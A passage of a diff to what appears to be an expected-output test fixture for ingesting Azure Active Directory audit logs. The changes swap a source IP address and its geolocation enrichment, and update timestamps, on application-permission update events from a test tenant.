5a59078\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n 
\\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.124939Z", + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:34:52\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"08d8bb01-c269-4a92-9929-a1a89b729512\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"5345f95e-44e0-48fc-823c-8206ff821338\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:52.5873254Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FQXLK\"},{\"Name\":\"env_seqNum\",\"Value\":\"42492828\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##957dae7d-5f0a-4e82-a428-61c0dba2878b_00000000-0000-0000-0000-000000000000_957dae7d-5f0a-4e82-a428-61c0dba2878b\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR565\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"fe115c66-3e08-4ab4-8a00-84ae25a59078\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n 
\\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -3897,25 +3555,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -3929,7 +3569,7 @@ "ObjectId": "Not Available", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -4043,7 +3683,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { 
@@ -4055,12 +3695,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036181100Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:34:52\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"08d8bb01-c269-4a92-9929-a1a89b729512\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"5345f95e-44e0-48fc-823c-8206ff821338\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:52.5873254Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FQXLK\"},{\"Name\":\"env_seqNum\",\"Value\":\"42492828\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##957dae7d-5f0a-4e82-a428-61c0dba2878b_00000000-0000-0000-0000-000000000000_957dae7d-5f0a-4e82-a428-61c0dba2878b\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR565\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"fe115c66-3e08-4ab4-8a00-84ae25a59078\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n 
\\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.124945600Z", + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:34:52\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"08d8bb01-c269-4a92-9929-a1a89b729512\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"5345f95e-44e0-48fc-823c-8206ff821338\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:52.5873254Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FQXLK\"},{\"Name\":\"env_seqNum\",\"Value\":\"42492828\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##957dae7d-5f0a-4e82-a428-61c0dba2878b_00000000-0000-0000-0000-000000000000_957dae7d-5f0a-4e82-a428-61c0dba2878b\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR565\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"fe115c66-3e08-4ab4-8a00-84ae25a59078\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n 
\\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -4086,25 +3726,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -4118,7 +3740,7 @@ "ObjectId": "71a0194b-b70c-44a6-82f2-d4670aee4585", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -4241,7 +3863,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { 
@@ -4253,12 +3875,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036187400Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:34:52\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\